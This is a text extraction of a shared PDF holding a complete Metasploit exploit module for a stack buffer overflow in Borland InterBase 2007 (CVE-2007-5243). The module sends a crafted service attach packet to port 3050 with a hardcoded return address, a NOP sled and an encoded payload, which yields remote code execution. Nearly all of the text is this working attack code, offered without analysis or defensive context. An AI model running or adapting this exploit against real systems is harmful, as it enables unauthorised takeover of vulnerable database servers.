Borland Interbase 2007_ 2007SP2 INET_connect Buffer Overflow.pdf

About Global Documents

Global Documents provides you with documents from around the globe on a variety of topics for your enjoyment.

Global Documents utilizes edocr for all its document needs due to edocr's wonderful content features. Thousands of professionals and businesses around the globe publish marketing, sales, operations, customer service and financial documents making it easier for prospects and customers to find content.

Borland InterBase buf INET_connect Buffer Overflow 2007SP2 INET_connect Buffer Buffer Overflow Adriano Overflow Adriano Lima length msf Exploit Remote

1 ##
2 # $Id$
3 ##
4
5 ##
6 # This file is part of the Metasploit Framework and may be subject to
7 # redistribution and commercial restrictions. Please see the Metasploit
8 # Framework web site for more information on licensing and terms of use.
9 # http://metasploit.com/framework/
10 ##
11
12
13 require ’msf/core’
14
15
16 class Metasploit3 < Msf::Exploit::Remote
17
18
include Msf::Exploit::Remote::Tcp
19
20
def initialize(info = {})
21
super(update_info(info,
22
’Name’
=> ’Borland InterBase INET_connect() Buffer Overflow’,
23
’Description’
=> %q{
24
This module exploits a stack overflow in Borland InterBase
25
by sending a specially crafted service attach request.
26
},
27
’Version’
=> ’$Revision$’,
28
’Author’
=>
29
[
30
’ramon’,
31
’Adriano Lima <adriano@risesecurity.org>’,
32
],
33
’Arch’
=> ARCH_X86,
34
’Platform’
=> ’linux’,
35
’References’
=>
36
[
37
[ ’CVE’, ’2007−5243’ ],
38
[ ’OSVDB’, ’38605’ ],
39
[ ’BID’, ’25917’ ],
40
[ ’URL’, ’http://www.risesecurity.org/advisories/RISE−2007002.txt’ ],
41
],
42
’Privileged’
=> true,
43
’License’
=> MSF_LICENSE,
44
’Payload’
=>
45
{
46
’Space’ => 512,
47
’BadChars’ => "\x00\x2f\x3a\x40\x5c",
48
},
49
’Targets’
=>
50
[
51
# 0x0804d2ee 5b5e5f5dc3
52
[
Page 1/3
Borland Interbase 2007, 2007SP2 INET_connect Buffer Overflow
Adriano Lima
10/03/2007
53
’Borland InterBase LI−V8.0.0.53 LI−V8.0.0.54 LI−V8.1.0.253’,
54
{ ’Ret’ => 0x0804d2ee }
55
],
56
],
57
’DefaultTarget’
=> 0
58
))
59
60
register_options(
61
[
62
Opt::RPORT(3050)
63
],
64
self.class
65
)
66
67
end
68
69
def exploit
70
71
connect
72
73
# Attach database
74
op_attach = 19
75
76
# Create database
77
op_create = 20
78
79
# Service attach
80
op_service_attach = 82
81
82
length = 161
83
remainder = length.remainder(4)
84
padding = 0
85
86
if remainder > 0
87
padding = (4 − remainder)
88
end
89
90
buf = ’’
91
92
# Operation/packet type
93
buf << [op_service_attach].pack(’N’)
94
95
# Id
96
buf << [0].pack(’N’)
97
98
# Length
99
buf << [length].pack(’N’)
100
101
# Random alpha data
102
buf << rand_text_alpha(length − 5)
103
104
# Target
Page 2/3
Borland Interbase 2007, 2007SP2 INET_connect Buffer Overflow
Adriano Lima
10/03/2007
105
buf << [target.ret].pack(’L’)
106
107
# Separator
108
buf << ’:’
109
110
# Padding
111
buf << "\x00" * padding
112
113
# Database parameter block
114
115
# Length
116
buf << [1024].pack(’N’)
117
118
# It will return into this nop block
119
buf << make_nops(1024 − payload.encoded.length)
120
121
# Payload
122
buf << payload.encoded
123
124
sock.put(buf)
125
126
handler
127
128
end
129
130 end
Page 3/3
Borland Interbase 2007, 2007SP2 INET_connect Buffer Overflow
Adriano Lima
10/03/2007